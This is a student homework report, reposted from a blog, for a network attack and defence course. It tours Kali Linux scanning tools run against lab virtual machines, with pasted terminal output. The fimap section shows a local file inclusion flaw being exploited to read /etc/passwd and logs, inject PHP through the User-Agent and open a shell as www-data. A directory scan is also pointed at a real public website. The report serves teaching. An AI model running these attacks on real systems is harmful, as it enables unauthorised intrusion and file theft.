20169216网络攻防技术第四次作业

openvas的简单使用

下面是使用openvas对靶机Metasploitable_Ubuntu系统漏洞扫描分析

最后生成的主机报告的pdf文档

web漏洞扫描器Golismero与Nikto

golismero scan 192.168.136.128

本地主机系统信息的收集工具

unix-privesc-check standard

lynis --check-all -Q

Web爬行工具

列出apache服务器上的用户名apache-users

apche-users -h 127.0.0.1 -l /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt -p 80 -s 0 -e 403 -t 10

对网站页面的快速截图cutycapt

cutycapt --url=http://www.baidu.com/ --out=baidu.png

对网站的目录进行扫描dirb

dirb http://www.baidu.com/

网站目录扫描的图形化工具dirbuster

Web漏洞扫描

WebDav漏洞探测

cadaver

root@kali:~# cadaver http://192.168.136.130/dav/
dav:/dav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye

testdav

root@kali:~# davtest -url http://192.168.136.130/dav/
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.136.130/dav
********************************************************
NOTE    Random string for this session: L9w03FLF1
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://192.168.136.130/dav/DavTestDir_L9w03FLF1
********************************************************
 Sending test files

从系统查看文件结果如下：

文件包含漏洞测试

fimap

首先查看msf已经存在的漏洞：

root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'
[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...
[05:57:09] [INFO] Fiddling around with URL...
[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.
[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...
[05:57:09] [INFO] Scriptpath received: '/var/www'
[05:57:09] [INFO] Operating System is 'Unix-Like'.
[05:57:09] [INFO] Testing file '/etc/passwd'...
[05:57:09] [INFO] Testing file '/proc/self/environ'...
[05:57:09] [INFO] Testing file 'php://input'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...
[05:57:09] [INFO] Testing file '/apache/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache/logs/access_log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...
[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/log/access_log'...
[05:57:10] [INFO] Testing file '/var/log/access.log'...
[05:57:10] [INFO] Testing file '/logs/access.log'...
[05:57:10] [INFO] Testing file '/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/log/auth.log'...
[05:57:10] [INFO] Testing file '/var/log/secure'...
[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
##################################################################
#[1] Possible PHP-File Inclusion                                 #
##################################################################
#::REQUEST                                                       #
#  [URL]        http://192.168.136.130/lfi.php?page=index.php    #
#  [HEAD SENT]                                                   #
#::VULN INFO                                                     #
#  [GET PARAM]  page                                             #
#  [PATH]       /var/www                                         #
#  [OS]         Unix                                             #
#  [TYPE]       Absolute Clean                                   #
#  [TRUNCATION] No Need. It's clean.                             #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd                              #
#                   [1] /proc/self/environ                       #
#                   [2] /var/log/auth.log                        #
##################################################################
root@kali:~# clear
root@kali:~# fimap -x --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###########################
#:: List of Domains ::    #
###########################
#[1] 192.168.136.130      #
#[q] Quit                 #
###########################
Choose Domain: 1
#####################################################################################################
#:: FI Bugs on '192.168.136.130' ::                                                                 #
#####################################################################################################
#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #
#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page'     #
#[q] Quit                                                                                           #
#####################################################################################################
Choose vulnerable script: 1
[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...
[06:01:09] [OUT] PHP Injection works! Testing if execution works...
[06:01:09] [INFO] Testing execution thru 'popen[b64]'...
[06:01:09] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks - PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey's reverse shell           #
#[3] [Test Plugin] Show some info                  #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www$>

Web应用漏洞扫描器

grabber

skipfish

uniscan WVS

wpscan

W3af

wapiti

websbag

webpliot

网络嗅探工具

wireshark

下面是使用攻击机向靶机使用nmap的SYN探测靶机是否在线；靶机使用wireshark嗅探抓包

转载于:https://www.cnblogs.com/q-z-y/p/6607940.html